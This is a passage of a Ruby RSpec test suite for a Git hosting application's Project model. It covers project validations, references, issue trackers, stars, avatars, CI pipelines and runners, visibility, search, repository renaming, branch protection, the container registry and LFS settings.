it { is_expected.to validate_uniqueness_of(:name).scoped_to(:namespace_id) }
it { is_expected.to validate_length_of(:name).is_at_most(255) }
it { is_expected.to validate_presence_of(:path) }
it { is_expected.to validate_uniqueness_of(:path).scoped_to(:namespace_id) }
it { is_expected.to validate_length_of(:path).is_at_most(255) }
it { is_expected.to validate_length_of(:description).is_at_most(2000) }
it { is_expected.to validate_presence_of(:creator) }
it { is_expected.to validate_presence_of(:namespace) }
it { is_expected.to validate_presence_of(:repository_storage) }
it 'does not allow new projects beyond user limits' do
project2 = build(:project)
allow(project2).to receive(:creator).and_return(double(can_create_project?: false, projects_limit: 0).as_null_object)
expect(project2).not_to be_valid
expect(project2.errors[:limit_reached].first).to match(/Personal project creation is not allowed/)
end
describe 'wiki path conflict' do
context "when the new path has been used by the wiki of other Project" do
it 'has an error on the name attribute' do
new_project = build_stubbed(:project, namespace_id: project.namespace_id, path: "#{project.path}.wiki")
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
context "when the new wiki path has been used by the path of other Project" do
it 'has an error on the name attribute' do
project_with_wiki_suffix = create(:project, path: 'foo.wiki')
new_project = build_stubbed(:project, namespace_id: project_with_wiki_suffix.namespace_id, path: 'foo')
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
end
context 'repository storages inclusion' do
let(:project2) { build(:project, repository_storage: 'missing') }
before do
storages = { 'custom' => 'tmp/tests/custom_repositories' }
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it "does not allow repository storages that don't match a label in the configuration" do
expect(project2).not_to be_valid
expect(project2.errors[:repository_storage].first).to match(/is not included in the list/)
end
end
it 'does not allow an invalid URI as import_url' do
project2 = build(:empty_project, import_url: 'invalid://')
expect(project2).not_to be_valid
end
it 'does allow a valid URI as import_url' do
project2 = build(:empty_project, import_url: 'ssh://[email protected]/project.git')
expect(project2).to be_valid
end
it 'allows an empty URI' do
project2 = build(:empty_project, import_url: '')
expect(project2).to be_valid
end
it 'does not produce import data on an empty URI' do
project2 = build(:empty_project, import_url: '')
expect(project2.import_data).to be_nil
end
it 'does not produce import data on an invalid URI' do
project2 = build(:empty_project, import_url: 'test://')
expect(project2.import_data).to be_nil
end
describe 'project pending deletion' do
let!(:project_pending_deletion) do
create(:empty_project,
pending_delete: true)
end
let(:new_project) do
build(:empty_project,
name: project_pending_deletion.name,
namespace: project_pending_deletion.namespace)
end
before do
new_project.validate
end
it 'contains errors related to the project being deleted' do
expect(new_project.errors.full_messages.first).to eq('The project is still being deleted. Please try again later.')
end
end
end
describe 'default_scope' do
it 'excludes projects pending deletion from the results' do
project = create(:empty_project)
create(:empty_project, pending_delete: true)
expect(Project.all).to eq [project]
end
end
describe 'project token' do
it 'sets a random token if none is provided' do
project = FactoryGirl.create :empty_project, runners_token: ''
expect(project.runners_token).not_to eq('')
end
it 'does not set a random token if one is provided' do
project = FactoryGirl.create :empty_project, runners_token: 'my-token'
expect(project.runners_token).to eq('my-token')
end
end
describe 'Respond to' do
it { is_expected.to respond_to(:url_to_repo) }
it { is_expected.to respond_to(:repo_exists?) }
it { is_expected.to respond_to(:execute_hooks) }
it { is_expected.to respond_to(:owner) }
it { is_expected.to respond_to(:path_with_namespace) }
end
describe 'delegation' do
it { is_expected.to delegate_method(:add_guest).to(:team) }
it { is_expected.to delegate_method(:add_reporter).to(:team) }
it { is_expected.to delegate_method(:add_developer).to(:team) }
it { is_expected.to delegate_method(:add_master).to(:team) }
end
describe '#name_with_namespace' do
let(:project) { build_stubbed(:empty_project) }
it { expect(project.name_with_namespace).to eq "#{project.namespace.human_name} / #{project.name}" }
it { expect(project.human_name).to eq project.name_with_namespace }
end
describe '#to_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, path: 'sample-namespace', owner: owner) }
let(:project) { create(:empty_project, path: 'sample-project', namespace: namespace) }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_reference).to be_nil
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:empty_project, name: 'another-project') }
it 'returns complete path to the project' do
expect(project.to_reference(another_namespace_project)).to eq 'sample-namespace/sample-project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:empty_project, namespace: namespace) }
it 'returns complete path to the project' do
expect(project.to_reference(another_project)).to eq 'sample-project'
end
end
end
describe '#to_human_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, name: 'Sample namespace', owner: owner) }
let(:project) { create(:empty_project, name: 'Sample project', namespace: namespace) }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_human_reference).to be_nil
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_human_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:empty_project, name: 'another-project') }
it 'returns complete name with namespace of the project' do
expect(project.to_human_reference(another_namespace_project)).to eq 'Gitlab / Sample project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:empty_project, namespace: namespace) }
it 'returns name of the project' do
expect(project.to_human_reference(another_project)).to eq 'Sample project'
end
end
end
describe '#repository_storage_path' do
let(:project) { create(:project, repository_storage: 'custom') }
before do
FileUtils.mkdir('tmp/tests/custom_repositories')
storages = { 'custom' => 'tmp/tests/custom_repositories' }
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
after do
FileUtils.rm_rf('tmp/tests/custom_repositories')
end
it 'returns the repository storage path' do
expect(project.repository_storage_path).to eq('tmp/tests/custom_repositories')
end
end
it 'returns valid url to repo' do
project = Project.new(path: 'somewhere')
expect(project.url_to_repo).to eq(Gitlab.config.gitlab_shell.ssh_path_prefix + 'somewhere.git')
end
describe "#web_url" do
let(:project) { create(:empty_project, path: "somewhere") }
it 'returns the full web URL for this repo' do
expect(project.web_url).to eq("#{Gitlab.config.gitlab.url}/#{project.namespace.path}/somewhere")
end
end
describe "#new_issue_address" do
let(:project) { create(:empty_project, path: "somewhere") }
let(:user) { create(:user) }
context 'incoming email enabled' do
before do
stub_incoming_email_setting(enabled: true, address: "p+%{key}@gl.ab")
end
it 'returns the address to create a new issue' do
address = "p+#{project.path_with_namespace}+#{user.incoming_email_token}@gl.ab"
expect(project.new_issue_address(user)).to eq(address)
end
end
context 'incoming email disabled' do
before do
stub_incoming_email_setting(enabled: false)
end
it 'returns nil' do
expect(project.new_issue_address(user)).to be_nil
end
end
end
describe 'last_activity methods' do
let(:timestamp) { 2.hours.ago }
# last_activity_at gets set to created_at upon creation
let(:project) { create(:project, created_at: timestamp, updated_at: timestamp) }
describe 'last_activity' do
it 'alias last_activity to last_event' do
last_event = create(:event, project: project)
expect(project.last_activity).to eq(last_event)
end
end
describe 'last_activity_date' do
it 'returns the creation date of the project\'s last event if present' do
new_event = create(:event, project: project, created_at: Time.now)
project.reload
expect(project.last_activity_at.to_i).to eq(new_event.created_at.to_i)
end
it 'returns the project\'s last update date if it has no events' do
expect(project.last_activity_date).to eq(project.updated_at)
end
end
end
describe '#get_issue' do
let(:project) { create(:empty_project) }
let!(:issue) { create(:issue, project: project) }
let(:user) { create(:user) }
before do
project.team << [user, :developer]
end
context 'with default issues tracker' do
it 'returns an issue' do
expect(project.get_issue(issue.iid, user)).to eq issue
end
it 'returns count of open issues' do
expect(project.open_issues_count).to eq(1)
end
it 'returns nil when no issue found' do
expect(project.get_issue(999, user)).to be_nil
end
it "returns nil when user doesn't have access" do
user = create(:user)
expect(project.get_issue(issue.iid, user)).to eq nil
end
end
context 'with external issues tracker' do
before do
allow(project).to receive(:default_issues_tracker?).and_return(false)
end
it 'returns an ExternalIssue' do
issue = project.get_issue('FOO-1234', user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq 'FOO-1234'
expect(issue.project).to eq project
end
end
end
describe '#issue_exists?' do
let(:project) { create(:empty_project) }
it 'is truthy when issue exists' do
expect(project).to receive(:get_issue).and_return(double)
expect(project.issue_exists?(1)).to be_truthy
end
it 'is falsey when issue does not exist' do
expect(project).to receive(:get_issue).and_return(nil)
expect(project.issue_exists?(1)).to be_falsey
end
end
describe '#to_param' do
context 'with namespace' do
before do
@group = create :group, name: 'gitlab'
@project = create(:project, name: 'gitlabhq', namespace: @group)
end
it { expect(@project.to_param).to eq('gitlabhq') }
end
context 'with invalid path' do
it 'returns previous path to keep project suitable for use in URLs when persisted' do
project = create(:empty_project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'gitlab'
end
it 'returns current path when new record' do
project = build(:empty_project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'foo&bar'
end
end
end
describe '#repository' do
let(:project) { create(:project) }
it 'returns valid repo' do
expect(project.repository).to be_kind_of(Repository)
end
end
describe '#default_issues_tracker?' do
let(:project) { create(:project) }
let(:ext_project) { create(:redmine_project) }
it "is true if used internal tracker" do
expect(project.default_issues_tracker?).to be_truthy
end
it "is false if used other tracker" do
expect(ext_project.default_issues_tracker?).to be_falsey
end
end
describe '#external_issue_tracker' do
let(:project) { create(:project) }
let(:ext_project) { create(:redmine_project) }
context 'on existing projects with no value for has_external_issue_tracker' do
before(:each) do
project.update_column(:has_external_issue_tracker, nil)
ext_project.update_column(:has_external_issue_tracker, nil)
end
it 'updates the has_external_issue_tracker boolean' do
expect do
project.external_issue_tracker
end.to change { project.reload.has_external_issue_tracker }.to(false)
expect do
ext_project.external_issue_tracker
end.to change { ext_project.reload.has_external_issue_tracker }.to(true)
end
end
it 'returns nil and does not query services when there is no external issue tracker' do
expect(project).not_to receive(:services)
expect(project.external_issue_tracker).to eq(nil)
end
it 'retrieves external_issue_tracker by querying services and caches it when there is an external issue tracker' do
ext_project.reload # Factory returns a project with changed attributes
expect(ext_project).to receive(:services).once.and_call_original
2.times { expect(ext_project.external_issue_tracker).to be_a_kind_of(RedmineService) }
end
end
describe '#cache_has_external_issue_tracker' do
let(:project) { create(:project, has_external_issue_tracker: nil) }
it 'stores true if there is any external_issue_tracker' do
services = double(:service, external_issue_trackers: [RedmineService.new])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker}.to(true)
end
it 'stores false if there is no external_issue_tracker' do
services = double(:service, external_issue_trackers: [])
expect(project).to receive(:services).and_return(services)
expect do
project.cache_has_external_issue_tracker
end.to change { project.has_external_issue_tracker}.to(false)
end
end
describe '#has_wiki?' do
let(:no_wiki_project) { create(:project, wiki_access_level: ProjectFeature::DISABLED, has_external_wiki: false) }
let(:wiki_enabled_project) { create(:project) }
let(:external_wiki_project) { create(:project, has_external_wiki: true) }
it 'returns true if project is wiki enabled or has external wiki' do
expect(wiki_enabled_project).to have_wiki
expect(external_wiki_project).to have_wiki
expect(no_wiki_project).not_to have_wiki
end
end
describe '#external_wiki' do
let(:project) { create(:project) }
context 'with an active external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: true)
project.external_wiki
end
it 'sets :has_external_wiki as true' do
expect(project.has_external_wiki).to be(true)
end
it 'sets :has_external_wiki as false if an external wiki service is destroyed later' do
expect(project.has_external_wiki).to be(true)
project.services.external_wikis.first.destroy
expect(project.has_external_wiki).to be(false)
end
end
context 'with an inactive external wiki' do
before do
create(:service, project: project, type: 'ExternalWikiService', active: false)
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
end
context 'with no external wiki' do
before do
project.external_wiki
end
it 'sets :has_external_wiki as false' do
expect(project.has_external_wiki).to be(false)
end
it 'sets :has_external_wiki as true if an external wiki service is created later' do
expect(project.has_external_wiki).to be(false)
create(:service, project: project, type: 'ExternalWikiService', active: true)
expect(project.has_external_wiki).to be(true)
end
end
end
describe '#open_branches' do
let(:project) { create(:project) }
before do
project.protected_branches.create(name: 'master')
end
it { expect(project.open_branches.map(&:name)).to include('feature') }
it { expect(project.open_branches.map(&:name)).not_to include('master') }
it "includes branches matching a protected branch wildcard" do
expect(project.open_branches.map(&:name)).to include('feature')
create(:protected_branch, name: 'feat*', project: project)
expect(Project.find(project.id).open_branches.map(&:name)).to include('feature')
end
end
describe '#star_count' do
it 'counts stars from multiple users' do
user1 = create :user
user2 = create :user
project = create :project, :public
expect(project.star_count).to eq(0)
user1.toggle_star(project)
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(2)
user1.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(1)
user2.toggle_star(project)
project.reload
expect(project.reload.star_count).to eq(0)
end
it 'counts stars on the right project' do
user = create :user
project1 = create :project, :public
project2 = create :project, :public
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(1)
expect(project2.star_count).to eq(0)
user.toggle_star(project1)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(1)
user.toggle_star(project2)
project1.reload
project2.reload
expect(project1.star_count).to eq(0)
expect(project2.star_count).to eq(0)
end
end
describe '#avatar_type' do
let(:project) { create(:project) }
it 'is true if avatar is image' do
project.update_attribute(:avatar, 'uploads/avatar.png')
expect(project.avatar_type).to be_truthy
end
it 'is false if avatar is html page' do
project.update_attribute(:avatar, 'uploads/avatar.html')
expect(project.avatar_type).to eq(['only images allowed'])
end
end
describe '#avatar_url' do
subject { project.avatar_url }
let(:project) { create(:project) }
context 'When avatar file is uploaded' do
before do
project.update_columns(avatar: 'uploads/avatar.png')
allow(project.avatar).to receive(:present?) { true }
end
let(:avatar_path) do
"/uploads/project/avatar/#{project.id}/uploads/avatar.png"
end
it { should eq "http://#{Gitlab.config.gitlab.host}#{avatar_path}" }
end
context 'When avatar file in git' do
before do
allow(project).to receive(:avatar_in_git) { true }
end
let(:avatar_path) do
"/#{project.namespace.name}/#{project.path}/avatar"
end
it { should eq "http://#{Gitlab.config.gitlab.host}#{avatar_path}" }
end
context 'when git repo is empty' do
let(:project) { create(:empty_project) }
it { should eq nil }
end
end
describe '#pipeline_for' do
let(:project) { create(:project) }
let!(:pipeline) { create_pipeline }
shared_examples 'giving the correct pipeline' do
it { is_expected.to eq(pipeline) }
context 'return latest' do
let!(:pipeline2) { create_pipeline }
it { is_expected.to eq(pipeline2) }
end
end
context 'with explicit sha' do
subject { project.pipeline_for('master', pipeline.sha) }
it_behaves_like 'giving the correct pipeline'
end
context 'with implicit sha' do
subject { project.pipeline_for('master') }
it_behaves_like 'giving the correct pipeline'
end
def create_pipeline
create(:ci_pipeline,
project: project,
ref: 'master',
sha: project.commit('master').sha)
end
end
describe '#builds_enabled' do
let(:project) { create :project }
subject { project.builds_enabled }
it { expect(project.builds_enabled?).to be_truthy }
end
describe '.cached_count', caching: true do
let(:group) { create(:group, :public) }
let!(:project1) { create(:empty_project, :public, group: group) }
let!(:project2) { create(:empty_project, :public, group: group) }
it 'returns total project count' do
expect(Project).to receive(:count).once.and_call_original
3.times do
expect(Project.cached_count).to eq(2)
end
end
end
describe '.trending' do
let(:group) { create(:group, :public) }
let(:project1) { create(:empty_project, :public, group: group) }
let(:project2) { create(:empty_project, :public, group: group) }
before do
2.times do
create(:note_on_commit, project: project1)
end
create(:note_on_commit, project: project2)
TrendingProject.refresh!
end
subject { described_class.trending.to_a }
it 'sorts projects by the amount of notes in descending order' do
expect(subject).to eq([project1, project2])
end
it 'does not take system notes into account' do
10.times do
create(:note_on_commit, project: project2, system: true)
end
expect(described_class.trending.to_a).to eq([project1, project2])
end
end
describe '.visible_to_user' do
let!(:project) { create(:project, :private) }
let!(:user) { create(:user) }
subject { described_class.visible_to_user(user) }
describe 'when a user has access to a project' do
before do
project.add_user(user, Gitlab::Access::MASTER)
end
it { is_expected.to eq([project]) }
end
describe 'when a user does not have access to any projects' do
it { is_expected.to eq([]) }
end
end
context 'repository storage by default' do
let(:project) { create(:empty_project) }
before do
storages = {
'default' => 'tmp/tests/repositories',
'picked' => 'tmp/tests/repositories',
}
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it 'picks storage from ApplicationSetting' do
expect_any_instance_of(ApplicationSetting).to receive(:pick_repository_storage).and_return('picked')
expect(project.repository_storage).to eq('picked')
end
end
context 'shared runners by default' do
let(:project) { create(:empty_project) }
subject { project.shared_runners_enabled }
context 'are enabled' do
before { stub_application_setting(shared_runners_enabled: true) }
it { is_expected.to be_truthy }
end
context 'are disabled' do
before { stub_application_setting(shared_runners_enabled: false) }
it { is_expected.to be_falsey }
end
end
describe '#any_runners' do
let(:project) { create(:empty_project, shared_runners_enabled: shared_runners_enabled) }
let(:specific_runner) { create(:ci_runner) }
let(:shared_runner) { create(:ci_runner, :shared) }
context 'for shared runners disabled' do
let(:shared_runners_enabled) { false }
it 'has no runners available' do
expect(project.any_runners?).to be_falsey
end
it 'has a specific runner' do
project.runners << specific_runner
expect(project.any_runners?).to be_truthy
end
it 'has a shared runner, but it is not allowed to be used' do
shared_runner
expect(project.any_runners?).to be_falsey
end
it 'checks the presence of specific runner' do
project.runners << specific_runner
expect(project.any_runners? { |runner| runner == specific_runner }).to be_truthy
end
end
context 'for shared runners enabled' do
let(:shared_runners_enabled) { true }
it 'has a shared runner' do
shared_runner
expect(project.any_runners?).to be_truthy
end
it 'checks the presence of shared runner' do
shared_runner
expect(project.any_runners? { |runner| runner == shared_runner }).to be_truthy
end
end
end
describe '#visibility_level_allowed?' do
let(:project) { create(:project, :internal) }
context 'when checking on non-forked project' do
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_truthy }
end
context 'when checking on forked project' do
let(:project) { create(:project, :internal) }
let(:forked_project) { create(:project, forked_from_project: project) }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PRIVATE)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_truthy }
it { expect(forked_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '.search' do
let(:project) { create(:project, description: 'kitten mittens') }
it 'returns projects with a matching name' do
expect(described_class.search(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search(project.name[0..2])).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search(project.name.upcase)).to eq([project])
end
it 'returns projects with a matching description' do
expect(described_class.search(project.description)).to eq([project])
end
it 'returns projects with a partially matching description' do
expect(described_class.search('kitten')).to eq([project])
end
it 'returns projects with a matching description regardless of the casing' do
expect(described_class.search('KITTEN')).to eq([project])
end
it 'returns projects with a matching path' do
expect(described_class.search(project.path)).to eq([project])
end
it 'returns projects with a partially matching path' do
expect(described_class.search(project.path[0..2])).to eq([project])
end
it 'returns projects with a matching path regardless of the casing' do
expect(described_class.search(project.path.upcase)).to eq([project])
end
it 'returns projects with a matching namespace name' do
expect(described_class.search(project.namespace.name)).to eq([project])
end
it 'returns projects with a partially matching namespace name' do
expect(described_class.search(project.namespace.name[0..2])).to eq([project])
end
it 'returns projects with a matching namespace name regardless of the casing' do
expect(described_class.search(project.namespace.name.upcase)).to eq([project])
end
it 'returns projects when eager loading namespaces' do
relation = described_class.all.includes(:namespace)
expect(relation.search(project.namespace.name)).to eq([project])
end
end
describe '#rename_repo' do
let(:project) { create(:project) }
let(:gitlab_shell) { Gitlab::Shell.new }
before do
# Project#gitlab_shell returns a new instance of Gitlab::Shell on every
# call. This makes testing a bit easier.
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
allow(project).to receive(:previous_changes).and_return('path' => ['foo'])
end
it 'renames a repository' do
ns = project.namespace_dir
expect(gitlab_shell).to receive(:mv_repository).
ordered.
with(project.repository_storage_path, "#{ns}/foo", "#{ns}/#{project.path}").
and_return(true)
expect(gitlab_shell).to receive(:mv_repository).
ordered.
with(project.repository_storage_path, "#{ns}/foo.wiki", "#{ns}/#{project.path}.wiki").
and_return(true)
expect_any_instance_of(SystemHooksService).
to receive(:execute_hooks_for).
with(project, :rename)
expect_any_instance_of(Gitlab::UploadsTransfer).
to receive(:rename_project).
with('foo', project.path, ns)
expect(project).to receive(:expire_caches_before_rename)
project.rename_repo
end
context 'container registry with tags' do
before do
stub_container_registry_config(enabled: true)
stub_container_registry_tags('tag')
end
subject { project.rename_repo }
it { expect{subject}.to raise_error(Exception) }
end
end
describe '#expire_caches_before_rename' do
let(:project) { create(:project) }
let(:repo) { double(:repo, exists?: true) }
let(:wiki) { double(:wiki, exists?: true) }
it 'expires the caches of the repository and wiki' do
allow(Repository).to receive(:new).
with('foo', project).
and_return(repo)
allow(Repository).to receive(:new).
with('foo.wiki', project).
and_return(wiki)
expect(repo).to receive(:before_delete)
expect(wiki).to receive(:before_delete)
project.expire_caches_before_rename('foo')
end
end
describe '.search_by_title' do
let(:project) { create(:project, name: 'kittens') }
it 'returns projects with a matching name' do
expect(described_class.search_by_title(project.name)).to eq([project])
end
it 'returns projects with a partially matching name' do
expect(described_class.search_by_title('kitten')).to eq([project])
end
it 'returns projects with a matching name regardless of the casing' do
expect(described_class.search_by_title('KITTENS')).to eq([project])
end
end
context 'when checking projects from groups' do
let(:private_group) { create(:group, visibility_level: 0) }
let(:internal_group) { create(:group, visibility_level: 10) }
let(:private_project) { create :project, :private, group: private_group }
let(:internal_project) { create :project, :internal, group: internal_group }
context 'when group is private project can not be internal' do
it { expect(private_project.visibility_level_allowed?(Gitlab::VisibilityLevel::INTERNAL)).to be_falsey }
end
context 'when group is internal project can not be public' do
it { expect(internal_project.visibility_level_allowed?(Gitlab::VisibilityLevel::PUBLIC)).to be_falsey }
end
end
describe '#create_repository' do
let(:project) { create(:project) }
let(:shell) { Gitlab::Shell.new }
before do
allow(project).to receive(:gitlab_shell).and_return(shell)
end
context 'using a regular repository' do
it 'creates the repository' do
expect(shell).to receive(:add_repository).
with(project.repository_storage_path, project.path_with_namespace).
and_return(true)
expect(project.repository).to receive(:after_create)
expect(project.create_repository).to eq(true)
end
it 'adds an error if the repository could not be created' do
expect(shell).to receive(:add_repository).
with(project.repository_storage_path, project.path_with_namespace).
and_return(false)
expect(project.repository).not_to receive(:after_create)
expect(project.create_repository).to eq(false)
expect(project.errors).not_to be_empty
end
end
context 'using a forked repository' do
it 'does nothing' do
expect(project).to receive(:forked?).and_return(true)
expect(shell).not_to receive(:add_repository)
project.create_repository
end
end
end
describe '#protected_branch?' do
context 'existing project' do
let(:project) { create(:project) }
it 'returns true when the branch matches a protected branch via direct match' do
create(:protected_branch, project: project, name: "foo")
expect(project.protected_branch?('foo')).to eq(true)
end
it 'returns true when the branch matches a protected branch via wildcard match' do
create(:protected_branch, project: project, name: "production/*")
expect(project.protected_branch?('production/some-branch')).to eq(true)
end
it 'returns false when the branch does not match a protected branch via direct match' do
expect(project.protected_branch?('foo')).to eq(false)
end
it 'returns false when the branch does not match a protected branch via wildcard match' do
create(:protected_branch, project: project, name: "production/*")
expect(project.protected_branch?('staging/some-branch')).to eq(false)
end
end
context "new project" do
let(:project) { create(:empty_project) }
it 'returns false when default_protected_branch is unprotected' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_NONE)
expect(project.protected_branch?('master')).to be false
end
it 'returns false when default_protected_branch lets developers push' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_PUSH)
expect(project.protected_branch?('master')).to be false
end
      it 'returns true when default_branch_protection does not let developers push but lets developers merge branches' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_MERGE)
expect(project.protected_branch?('master')).to be true
end
it 'returns true when default_branch_protection is in full protection' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_FULL)
expect(project.protected_branch?('master')).to be true
end
end
end
describe '#user_can_push_to_empty_repo?' do
let(:project) { create(:empty_project) }
let(:user) { create(:user) }
it 'returns false when default_branch_protection is in full protection and user is developer' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_FULL)
expect(project.user_can_push_to_empty_repo?(user)).to be_falsey
end
it 'returns false when default_branch_protection only lets devs merge and user is dev' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_MERGE)
expect(project.user_can_push_to_empty_repo?(user)).to be_falsey
end
it 'returns true when default_branch_protection lets devs push and user is developer' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_PUSH)
expect(project.user_can_push_to_empty_repo?(user)).to be_truthy
end
it 'returns true when default_branch_protection is unprotected and user is developer' do
project.team << [user, :developer]
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_NONE)
expect(project.user_can_push_to_empty_repo?(user)).to be_truthy
end
it 'returns true when user is master' do
project.team << [user, :master]
expect(project.user_can_push_to_empty_repo?(user)).to be_truthy
end
end
describe '#container_registry_path_with_namespace' do
let(:project) { create(:empty_project, path: 'PROJECT') }
subject { project.container_registry_path_with_namespace }
it { is_expected.not_to eq(project.path_with_namespace) }
it { is_expected.to eq(project.path_with_namespace.downcase) }
end
describe '#container_registry_repository' do
let(:project) { create(:empty_project) }
before { stub_container_registry_config(enabled: true) }
subject { project.container_registry_repository }
it { is_expected.not_to be_nil }
end
describe '#container_registry_repository_url' do
let(:project) { create(:empty_project) }
subject { project.container_registry_repository_url }
before { stub_container_registry_config(**registry_settings) }
context 'for enabled registry' do
let(:registry_settings) do
{
enabled: true,
host_port: 'example.com',
}
end
it { is_expected.not_to be_nil }
end
context 'for disabled registry' do
let(:registry_settings) do
{
enabled: false
}
end
it { is_expected.to be_nil }
end
end
describe '#has_container_registry_tags?' do
let(:project) { create(:empty_project) }
subject { project.has_container_registry_tags? }
context 'for enabled registry' do
before { stub_container_registry_config(enabled: true) }
context 'with tags' do
before { stub_container_registry_tags('test', 'test2') }
it { is_expected.to be_truthy }
end
context 'when no tags' do
before { stub_container_registry_tags }
it { is_expected.to be_falsey }
end
end
context 'for disabled registry' do
before { stub_container_registry_config(enabled: false) }
it { is_expected.to be_falsey }
end
end
describe '#latest_successful_builds_for' do
def create_pipeline(status = 'success')
create(:ci_pipeline, project: project,
sha: project.commit.sha,
ref: project.default_branch,
status: status)
end
def create_build(new_pipeline = pipeline, name = 'test')
create(:ci_build, :success, :artifacts,
pipeline: new_pipeline,
status: new_pipeline.status,
name: name)
end
let(:project) { create(:project) }
let(:pipeline) { create_pipeline }
context 'with many builds' do
it 'gives the latest builds from latest pipeline' do
pipeline1 = create_pipeline
pipeline2 = create_pipeline
build1_p2 = create_build(pipeline2, 'test')
create_build(pipeline1, 'test')
create_build(pipeline1, 'test2')
build2_p2 = create_build(pipeline2, 'test2')
latest_builds = project.latest_successful_builds_for
expect(latest_builds).to contain_exactly(build2_p2, build1_p2)
end
end
context 'with succeeded pipeline' do
let!(:build) { create_build }
context 'standalone pipeline' do
it 'returns builds for ref for default_branch' do
builds = project.latest_successful_builds_for
expect(builds).to contain_exactly(build)
end
it 'returns empty relation if the build cannot be found' do
builds = project.latest_successful_builds_for('TAIL')
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
context 'with some pending pipeline' do
before do
create_build(create_pipeline('pending'))
end
it 'gives the latest build from latest pipeline' do
latest_build = project.latest_successful_builds_for
expect(latest_build).to contain_exactly(build)
end
end
end
context 'with pending pipeline' do
before do
pipeline.update(status: 'pending')
create_build(pipeline)
end
it 'returns empty relation' do
builds = project.latest_successful_builds_for
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
end
describe '#add_import_job' do
context 'forked' do
let(:forked_project_link) { create(:forked_project_link) }
let(:forked_from_project) { forked_project_link.forked_from_project }
let(:project) { forked_project_link.forked_to_project }
it 'schedules a RepositoryForkWorker job' do
expect(RepositoryForkWorker).to receive(:perform_async).
with(project.id, forked_from_project.repository_storage_path,
forked_from_project.path_with_namespace, project.namespace.path)
project.add_import_job
end
end
context 'not forked' do
let(:project) { create(:project) }
it 'schedules a RepositoryImportWorker job' do
expect(RepositoryImportWorker).to receive(:perform_async).with(project.id)
project.add_import_job
end
end
end
describe '#gitlab_project_import?' do
subject(:project) { build(:project, import_type: 'gitlab_project') }
it { expect(project.gitlab_project_import?).to be true }
end
describe '#gitea_import?' do
subject(:project) { build(:project, import_type: 'gitea') }
it { expect(project.gitea_import?).to be true }
end
describe '#lfs_enabled?' do
let(:project) { create(:project) }
shared_examples 'project overrides group' do
it 'returns true when enabled in project' do
project.update_attribute(:lfs_enabled, true)
expect(project.lfs_enabled?).to be_truthy
end
it 'returns false when disabled in project' do
project.update_attribute(:lfs_enabled, false)
expect(project.lfs_enabled?).to be_falsey
end
it 'returns the value from the namespace, when no value is set in project' do
expect(project.lfs_enabled?).to eq(project.namespace.lfs_enabled?)
end
end
context 'LFS disabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, false)
enable_lfs
end
it_behaves_like 'project overrides group'
end
context 'LFS enabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, true)
enable_lfs
end
it_behaves_like 'project overrides group'
end
describe 'LFS disabled globally' do
shared_examples 'it always returns false' do
it do
expect(project.lfs_enabled?).to be_falsey
expect(project.namespace.lfs_enabled?).to be_falsey
end
end
context 'when no values are set' do
it_behaves_like 'it always returns false'
end
context 'when all values are set to true' do
